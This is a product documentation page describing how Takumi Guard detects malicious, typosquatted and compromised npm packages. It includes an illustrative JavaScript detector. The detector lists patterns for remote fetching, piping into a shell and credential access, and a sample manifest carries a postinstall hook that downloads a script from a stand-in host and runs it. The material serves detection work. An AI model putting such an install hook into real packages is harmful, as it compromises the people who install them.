Intelligence
The English user guide is currently in beta preview. Most of the documents have been automatically translated from the Japanese version. Should you find any inaccuracies, please reach out to Flatt Security.
The Takumi Guard blocklist is maintained by a threat analysis platform built and operated by the GMO Flatt Security research team. This page explains how threat intelligence is collected and how blocking decisions are made.
Analysis Pipeline
The blocklist is built through the following pipeline:
1. New Package Monitoring
The npm registry provides a change feed via the Replicate API that streams package publications and updates in real time. This feed is continuously monitored, ensuring packages are analyzed shortly after publication.
2. Automated Analysis
Fetched packages are run through an automated analysis pipeline built by the research team. Multiple techniques are combined to determine malicious intent, including inspection of install scripts, detection of obfuscated code, matching against known malware patterns, and execution in a sandbox environment to detect suspicious behavior.
3. Verdict and Blocklist Update
Based on analysis results, packages are classified into the following categories:
- Malware: Packages that perform malicious actions during installation or execution
- Typosquatting: Packages with names similar to popular packages that distribute malicious code
- Compromised packages: Legitimate packages with versions containing injected malicious code due to account takeover
The blocklist is updated continuously and propagated to all Takumi Guard instances.
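As an added illustration of the checks in steps 2 and 3 (example code written for this page, not Takumi Guard's pipeline), the following JavaScript inspects npm lifecycle scripts for install-time red flags and compares a package name against a constructed list of popular names, returning a verdict in the categories above. The regex patterns, the popular-name list, the distance threshold and the sample manifests are all assumptions made for the example.

```javascript
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"];
// Install-time heuristics. Patterns are illustrative, not the platform's rules.
const SUSPICIOUS = [
  { reason: "fetches remote content", re: /\b(curl|wget)\b|https?:\/\//i },
  { reason: "pipes fetched content into a shell", re: /\|\s*(sh|bash)\b/ },
  { reason: "decodes base64 at install time", re: /base64|atob\(/i },
  { reason: "evaluates dynamically built code", re: /\beval\(|new Function\(/ },
  { reason: "touches credentials or tokens", re: /\.npmrc|\.ssh|process\.env/ },
];

// Findings for the lifecycle scripts that npm runs automatically on install.
function inspectInstallScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    for (const { reason, re } of SUSPICIOUS) {
      if (re.test(cmd)) findings.push({ hook, reason, command: cmd });
    }
  }
  return findings;
}

// Levenshtein distance: how many single-character edits separate two names.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                         d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return d[a.length][b.length];
}

// Constructed stand-in for a "popular packages" list; not a real ranking.
const POPULAR = ["lodash", "express", "react", "axios"];

// Verdict in the page's categories. "Compromised packages" needs version
// history that a single manifest does not carry, so it is not modelled here.
function classify(pkg) {
  const findings = inspectInstallScripts(pkg);
  if (findings.length === 0) return null;
  const lookalike = POPULAR.find(p => p !== pkg.name && editDistance(p, pkg.name) <= 2);
  if (lookalike) return { verdict: "Typosquatting", lookalike, findings };
  return { verdict: "Malware", findings };
}

// Constructed sample manifests (not real packages).
const benign = { name: "example-lib", version: "1.0.0", scripts: { test: "node test.js" } };
const squatter = { name: "lodahs", version: "4.17.21",
  scripts: { postinstall: "curl -s https://example.invalid/x.sh | sh" } };
```

`classify(benign)` returns null, while `classify(squatter)` yields a Typosquatting verdict against lodash with two install-script findings.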
Compared to Public Advisories
Public advisory databases (such as the GitHub Advisory Database) have a time lag between reporting/confirmation and publication. Takumi Guard's intelligence platform performs real-time analysis from the change feed, enabling detection of zero-day malicious packages before they appear in public advisories.
Coverage
The intelligence platform currently covers the npm ecosystem. Support for additional package ecosystems (PyPI, RubyGems, etc.) is planned for future expansion.